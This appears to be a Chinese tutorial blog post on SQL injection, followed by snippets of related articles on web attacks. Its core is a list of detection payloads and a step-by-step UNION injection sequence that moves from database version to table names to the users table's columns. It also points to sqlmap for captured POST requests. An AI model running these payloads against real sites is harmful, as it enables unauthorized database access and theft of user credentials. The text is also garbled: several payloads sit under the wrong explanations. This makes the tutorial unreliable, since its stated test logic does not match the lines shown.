年輕的時候愛上什麼都不為過,成熟了以後放棄什麼都理解,我們終其一生,不過是想找乙個能一起吃飯的人。。。
---- 網易雲熱評
一、產生原因
**與資料不區分。程式把使用者輸入的惡意內容傳入sql語句中執行,導致sql注入漏洞產生。
二、常見挖掘方式
直接對url中的引數(請求引數、請求頭)進行注入
burp抓取post包進行注入
三、判斷注入點
單引號判斷:如果出現錯誤回顯,則該頁面就可能存在sql注入
'
and判斷:
or判斷:' and 1=1 返回正常
' and1=2 如果報錯,說明存在注入
xor判斷:後面的語句如果是正確的,則返回錯誤頁面,如果是錯誤的,則返回正確頁面,說明存在注入點' or 1=1
' or 1=2 返回正常,說明存在注入
加減號數字判斷:返回的頁面和前面的頁面相同,加上-1,返回錯誤頁面,則表示存在注入漏洞' xor 1=1
' xor 1=2
0-1
四、get請求注入流程:
1、判斷是否存在注入
2、判斷可顯示列1'
1' and 1=1
3、查詢版本號和資料庫1' order by 2#
1' order by 3#
1' union select 1,2#
1' union select version(),database()#
4、獲取當前資料庫的所有表名
1' union select 1,table_name from information_schema.tables where table_schema=database()#
5、獲取users表的列名
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
6、獲取users表的user和password列
五、post請求注入流程
1、通過burpsuite抓包
2、可以手動判斷,但是能用sqlmap就不用手動,所以將該包儲存到1.txt檔案
3、檢視是不是管理員許可權
禁止非法,後果自負
SQL注入漏洞攻擊
登陸判斷 select from t users where username and password 將引數拼到sql語句中。構造惡意的password or 1 1 if reader.read response.write 登入成功!else response.write 登入失敗!防範注入...
常見web系統攻擊方式歸納
常見web系統攻擊方式歸納 sql注入 常見於分頁功能或者查詢功能,對於傳入的引數未進行安全字元轉義或者過濾。一些需要提交字元資料的位置也是攻擊目標點。cookie竊取 此種攻擊常見於使用的認證憑據是cookie內容過於單一,沒有使用ip 時效性週期令牌等環境或者動態認證手段。系統內跨使用者資料攻擊...
常見web攻擊方式之DOS XSS
dos 攻擊常以 web 應用程式中脆弱的線路或 url 作為 目標,並向其傳送精心設計的資料報或 url,這樣會迫使伺服器陷入無限迴圈或進行 cpu 密集型運算,從而使得它從資料庫中大規模載入資料,最終迫使伺服器 cpu 超負荷運載以阻止伺服器執行其他請求。ddos 攻擊是指 dos 攻擊以一種精...